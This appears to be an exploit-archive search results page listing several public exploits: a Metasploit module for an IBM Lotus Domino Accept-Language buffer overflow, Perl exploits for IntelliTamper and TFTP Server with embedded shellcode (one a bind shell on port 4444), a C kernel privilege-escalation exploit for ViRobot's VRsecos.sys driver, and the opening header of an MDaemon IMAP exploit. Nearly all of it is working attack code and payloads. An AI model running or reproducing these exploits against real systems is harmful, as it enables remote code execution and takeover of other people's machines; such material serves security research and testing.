server 2008
Search result for 'server 2008'
(0.0508680343628 seconds)
metasploit/IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow ( windows)
##
# $Id: domino_http_accept_language.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
request with an Accept-Language header greater than 114 bytes.
},
'Author' => [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10998 $',
'References' =>
[
['CVE', '2008-2240'],
['OSVDB', '45415'],
['BID', '29310'],
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x20\x2c\x3b",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll
'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dl
'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll
'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dll
'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll
'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'JmpESP' => 0x62c6072e, # jmp esp @lsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll
'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll
'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
],
'DisclosureDate' => 'May 20 2008'))
register_options( [ Opt::RPORT(80) ], self.class )
end
def exploit
connect
lang = rand_text_alphanumeric(116) # greetz to hateful chris
lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi)
lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax)
lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash
lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1
lang << "\x00"
lang << payload.encoded
if(not target['DisableNX'])
lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4
lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2
lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top
else
lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8
lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2
lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3
lang[ 88, 4 ] = [target['Ret']].pack('V') # 4
lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6
lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top
lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5
end
uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1) # Trigger
print_status("Trying target #{target.name}...")
send_request_raw({
'uri' => "#{uri}",
'method' => 'GET',
'headers' =>
{
'Accept' => '*/*',
'Accept-Language' => "#{lang}",
'Accept-Encoding' => 'gzip,deflate',
'Keep-Alive' => '300',
'Connection' => 'keep-alive',
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
}
}, 5)
handler
disconnect
end
end
Koshi/IntelliTamper 2.07 (server header) Remote Code Execution Exploit ( windows)
#!/usr/bin/perl # # IntelliTamper 2.07 Remote Code Execution ( server header ) # # By: Koshi # # Guido Landi finally did it, thought i'd throw one in there. # This example assumes you're scanning "http://127.0.0.1" # For example, exploit may not work if you were to scan "http://127.0.0.1:80" # or even changing it as slightly as "http://127.0.0.1/" # # gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU, # and finally, Guido Landi for sparking my interest in exploiting # this application. # # use IO::Socket; my $msg=""; my $overflow = "A"x1536; my $fun = "". "\xb3\x8d\x95\x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL) "z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer. "AAAA2Cb3Cb4CBBBB"; # Starts executing here # win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com my $sh3llcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63". "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32". "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\x59\x59\x6c\x6a". "\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\x75\x75\x6c\x4c". "\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\x6b\x62\x6f\x36". "\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\x79\x6e\x6b\x76". "\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\x39\x4e\x4c\x6e". "\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\x4d\x76\x61\x4f". "\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\x44\x74\x35\x48". "\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\x66\x6e\x6b\x64". "\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\x6b\x4c\x4b\x37". "\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\x74\x56\x64\x4f". "\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\x70\x6f\x75\x49". "\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\x6b\x30\x70\x45". "\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\x49\x6e\x6b\x4b". "\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\x78\x75\x6c\x51". "\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\x78\x6c\x43\x6b". "\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\x34\x43\x6f\x43". "\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\x6f\x48\x67\x43". "\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\x58\x71\x75\x37". "\x70\x63"; my $overflow2 = "A"x1046; my $buff = "$overflow$fun$sh3llcode"; my $resp = "". "HTTP/1.1 200 OK\r\n". "Connection: close\r\n". "Content-Length: 8\r\n". "Date: Mon, 21 Jul 2008 20:47:05 GMT\r\n". "Content-Type: text/plain\r\n". "Server: $buff\r\n". "MIME-Version: 1.0\r\n\r\n". "Exploit!\r\n"; my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, ); print "Listening on port 80 for connections...\n"; my $new_sock = $sock->accept(); print "Got connection from client...\n"; my $sock_addr = recv($new_sock,$msg,190,0); print "Sending client packet...\n"; print $new_sock "$resp"; print "Packet sent to client, voila?\n"; close($sock); print "Socket closed\n"; # milw0rm.com [2008-07-22]
tixxDZ/TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit ( windows)
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# The Service or the RunStandAlone version.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ <tixxdz@gmail.com>
# Date: 07/05/2008
#
# Tested on Windows XP SP2 French not patched
#
# TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
# Other versions may also be vulnerable.
#
# TFTPServer respect the RFC 1350 for Error packets, lot of other
# TFTP Servers don't respect it.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
# BUFFER is at 0041B3AB in the .bss section.
# This exploit will overwrite all the .bss section and some portion of the .idata section
# to patch functions addresses in the IAT.
#
# For the TFTPServer Service we will patch the time() function
# For the TFTPServer StandAlone program we will patch the printf() function
#
# BUFFER = NOPS + SHELLCODE + RET
# we will put and execute our shellcode in the .idata section, .idata => RWE.
use strict;
use IO::Socket::INET;
my $target = shift ||
die "Usage: $0 <target> <type>\n <type> : type of the program\n".
"\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";
my $type = defined $ARGV[0] ? shift : 's';
my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x15\x24" .
"\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x4f\x0d" .
"\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x91\x7b" .
"\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x7f\x13" .
"\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x12\xe0" .
"\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x3d\xd2" .
"\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\xb3\x86" .
"\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\xa9\x43" .
"\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x02\xfd" .
"\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x24\x1c" .
"\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\xa0\x0c" .
"\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75" .
"\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x74\x8e" .
"\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\xc5\xdb" .
"\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x41\xa8" .
"\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x6d\x24" .
"\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x83\x45" .
"\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\xce\x18" .
"\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x32\x38" .
"\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x9b\xfb" .
"\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\xae\x44" .
"\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\xb8\x3f" .
"\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x0d\x67" .
"\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\xe9\xa1" .
"\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\xca\x50" .
"\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\xa3\xba" .
"\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\xdd\x40" .
"\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x06\x2d" .
"\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x3a\xf6" .
"\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x58\xf5" .
"\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x38\xd0" .
"\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x2d\xff" .
"\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x74\xef" .
"\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\xcd\xa7" .
"\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x46\xb9" .
"\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";
my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section
if ($type =~ /p/i) {
# "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
# ---------------------------------------------------------------------------
# 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>]
# ---------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
$buffer = "\x90" x 19907 . $shellcode . $RET;
}
else {
# "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
# ------------------------------------------------------------------------
# 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>]
# ------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer Service program\n";
$buffer = "\x90" x 19955 . $shellcode . $RET;
}
my $sock = IO::Socket::INET->new( PeerAddr => $target,
PeerPort => 69,
Proto => 'udp')
or die "error: $!\n";
$sock->send("\x00\x05" . $buffer, 0);
print STDOUT "done.\n";
exit 0;
# milw0rm.com [2008-05-08]
MJ0011/ViRobot Desktop 5.5 / Server 3.5 Privilege Escalation ( na)
Hauri
ViRobot Desktop 5.5 & ViRobot Server 3.5 VRsecos.sys <=2008.8.1.1 Local Kernel Mode Privilege Escalation Vulnerability
AUTHOR
MJ0011
EMAIL
th_decoder$126.com
VULNERABLE PRODUCTS
Hauri ViRobot Desktop 5.5 and below
Hauri ViRobot Server 3.5 and below
DETAILS:
VRsecos.sys create a device called "VRsecos" , and handles DeviceIoControl Code = 0x8307202c , which use the function "strcpy" to copy memory from irp systembuffer to driver's data area , can be overwrite critical kernel object memory in vrsecos.sys ' s data area
EXPLOIT CODE: (Test On Windows XP SP3 , only for vrsecos.sys == 2008.8.1.1)
\
// virobot0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
#include "malloc.h"
typedef struct X_DISPATCHER_HEADER{
UCHAR Type ;
UCHAR Absolute ;
UCHAR Size ;
UCHAR Inserted ;
ULONG SignalState ;
LIST_ENTRY WaitListHead ;
}X_DISPATCHER_HEADER , *PX_DISPATCHER_HEADER;
typedef struct X_KMUTANT{
X_DISPATCHER_HEADER Header ;
LIST_ENTRY MutantListEntry ;
PVOID OwnerThread ;
UCHAR Abandoned ;
UCHAR ApcDisable ;
}X_KMUTANT , *PX_KMUTANT;
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle("ntdll.dll");
PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation");
do
{
mPtr = malloc(mSize);
if (mPtr)
{
__asm
{
push 0
push mSize
push mPtr
push ATableType
call pZwQuerySystemInformation
mov status , eax
}
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc0000004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2,
ULONG color
);
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
ULONG Color
);
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
PUCHAR *Str
);
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
INBV_DISPLAY_STRING_FILTER DisplayStringFilter
);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
BOOLEAN bEnable
);
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2
);
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
PUCHAR Str
);
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;
PINBV_DISPLAY_STRING InbvDisplayString= 0 ;
#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] =
" "
" "
" "
" ---- ===== EXPLOIT SUCCESSFULLY ==== ---- "
" "
" "
" ViRobot Desktop 5.5 & ViRobot Server 3.5 Local Privilege Escalation Exploit "
" "
" VULNERABLE PRODUCT "
" "
" ViRobot Desktop 5.5 and below "
" ViRobot Server 3.5 and below "
" "
" VULERABLE FILE "
" VRsecos.sys <= 2008.8.1.1 "
" "
" AUTHOR "
" "
" MJ0011 "
" th_decoder$126.com "
" "
" 2010-8-22 "
" "
" "
" ";
VOID InbvShellCode()
{
//DISABLE INTERRUPT
__asm
{
cli
}
//RESET TO VGA MODE
InbvAcquireDisplayOwnership();
InbvResetDisplay();
//FILL FULL SCREEN
InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);
//SET TEXT COLOR
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);
InbvInstallDisplayStringFilter(NULL);
InbvEnableDisplayString(TRUE);
InbvSetScrollRegion( 0 , 0 , 639 ,477);
InbvDisplayString(DisplayString);
while(TRUE)
{
};
}
BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
{
HMODULE hlib = LoadLibrary(ntosname);
if (hlib == NULL)
{
return FALSE ;
}
InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);
InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);
InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);
InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);
InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);
InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
if (InbvAcquireDisplayOwnership &&
InbvResetDisplay &&
InbvSolidColorFill &&
InbvSetTextColor &&
InbvInstallDisplayStringFilter &&
InbvEnableDisplayString &&
InbvSetScrollRegion &&
InbvDisplayString)
{
return TRUE ;
}
return FALSE ;
}
int main(int argc, char* argv[])
{
printf("ViRotbot Desktop 5.5 & ViRobot Server 3.5 vrsecos.sys <= 2008.8.1.1\n"
"Local Kernel Mode Privilege Escalation Vulnerability POC\n\n"
"This Exploit Code Only for vrsecos == 2008.8.1.1\n"
"Test On Windows XP SP3\n\n"
"By MJ0011 th_decoder$126.com\n\n"
"Press Enter\n");
getchar();
HANDLE hDev = CreateFile("\\\\.\\VRsecos" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0 , OPEN_EXISTING , 0 , 0 );
if (hDev == INVALID_HANDLE_VALUE)
{
printf("cannot open device....%u\n" , GetLastError());
//return 0;
}
//data for IoControlCode = 8307202C , buffer overrun
PVOID pdata = malloc(0x2000);
//fill non-zero data
memset(pdata , 0x20 , 0x2000);
//process mutx ...
PX_KMUTANT pmutant = (PX_KMUTANT)((ULONG)pdata + 0x858 + 200);
HANDLE hthread = OpenThread(THREAD_ALL_ACCESS , FALSE , GetCurrentThreadId());
PSYSTEM_HANDLE_INFORMATION phi = (PSYSTEM_HANDLE_INFORMATION)GetInfoTable(SystemHandleInformation);
PSYSTEM_MODULE_INFORMATION pmi = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
//get base address of vrsecos.sys
PVOID vrsecosbase = 0 ;
ULONG i ;
for (i = 0 ; i < pmi->Count ; i ++)
{
if (stricmp((PCHAR)(pmi->Module[i].ImageName + strlen(pmi->Module[i].ImageName ) - strlen("vrsecos.sys")) ,
"vrsecos.sys") == 0 )
{
vrsecosbase = pmi->Module[i].Base;
break ;
}
}
if (vrsecosbase == 0 )
{
printf("cannot find vrsecos....\n");
//return 0 ;
}
if (!InbvInit(pmi->Module[0].Base , strrchr(pmi->Module[0].ImageName , '\\')+1))
{
printf("cannot init inbv system\n");
return 0 ;
}
//get thread object
PVOID MyThreadOBJ = NULL ;
for (i = 0 ; i < phi->NumberOfHandles ; i ++)
{
if (phi->Information[i].HandleValue == (USHORT)hthread &&
phi->Information[i].UniqueProcessId == (USHORT)GetCurrentProcessId())
{
MyThreadOBJ = phi->Information[i].Object;
break ;
}
}
if (MyThreadOBJ == NULL)
{
printf("cannot find my thread object\n");
return 0 ;
}
//for KeWaitForSignleObject
//KeWaitForSignleObject will check SignalState
pmutant->Header.SignalState = 0x30303030;
pmutant->MutantListEntry.Flink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0 );
pmutant->MutantListEntry.Blink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0) ;
//for KeReleaseMutex , Mutant 's owner thread must be our thread when KeReleaseMutex
pmutant->OwnerThread = MyThreadOBJ;
//for IOCTL CODE 0x83072014
//spec NPAGED_LOOKASIDE_LIST List
//
// user address space
PVOID pAlloc = VirtualAlloc((PVOID)0x0A0A0A0A , 0x1000 , MEM_RESERVE|MEM_COMMIT , PAGE_READWRITE);
if (pAlloc == NULL)
{
printf("cannot allocate spec addr %u\n! ", GetLastError());
return 0 ;
}
*(DWORD*)0x0a0a0101 = 0 ;
// vrsecos+2d68 < vrsecos+2d64
// and vrsecos+2d68 < 0
*(DWORD*)((ULONG)pdata + 0x81c +200) = 0xc1c1c1c1 ;
*(DWORD*)((ULONG)pdata + 0x820 + 200) = 0xc0c0c0c0 ;
//fill NPAGED_LOOKASIDE_LIST
*(DWORD*)((ULONG)pdata + 0xdd8 + 200) = 0x0a0a0101;
*(DWORD*)((ULONG)pdata + 0xddc +200 ) = 0x01010101 ;
//fill NPAGE_LOOKASIDE_LIST->AllocateRoutine
//is our R0 Shell Code !!!
*(DWORD*)((ULONG)pdata + 0xdd8 + 0x28 +200 ) = (DWORD)InbvShellCode;
ULONG btr ;
ULONG temp;
//memory overflow!!
if (!DeviceIoControl(hDev , 0x8307202c , pdata , 0x1000 , NULL , 0 , &btr , NULL ))
{
printf("dev ctl 1 failed %u\n", GetLastError());
return 0 ;
}
PVOID pdata2 = malloc(0x6d4);
*(DWORD*)pdata2 = 1;
*(ULONG*)((ULONG)pdata2 + 8 ) = 0 ;
strcpy((PCHAR)((ULONG)pdata2 + 264) , "exploit you !");
strcpy((PCHAR)((ULONG)pdata2 + 464) , "exploit you !!");
//first time , NPAGED_LOOKASIDE_LIST got ZERO !!
if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
{
printf("dev ctrl 2 failed %u\n", GetLastError());
return 0 ;
}
//second time , go NPAGED_LOOKASIDE_LIST->AllocateRoutine!!
if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
{
printf("dev ctrl 2 failed %u\n", GetLastError());
return 0 ;
}
return 0 ;
}
ViRobot Desktop version 5.5 and Server version 3.5 local kernel mode privilege escalation exploit.
Matteo Memelli/MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit ( windows)
#!/usr/bin/python
###############################################################################
#
# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
# Bug discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : MDaemon IMAP server v9.6.4
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
#
# Thx to Silvia for feeding my obsessions
# Thx to didNot at #offsec
# (yes he doesn't look like Silvia but he's a nice guy LOL)
# and to www.offensive-security.com
#
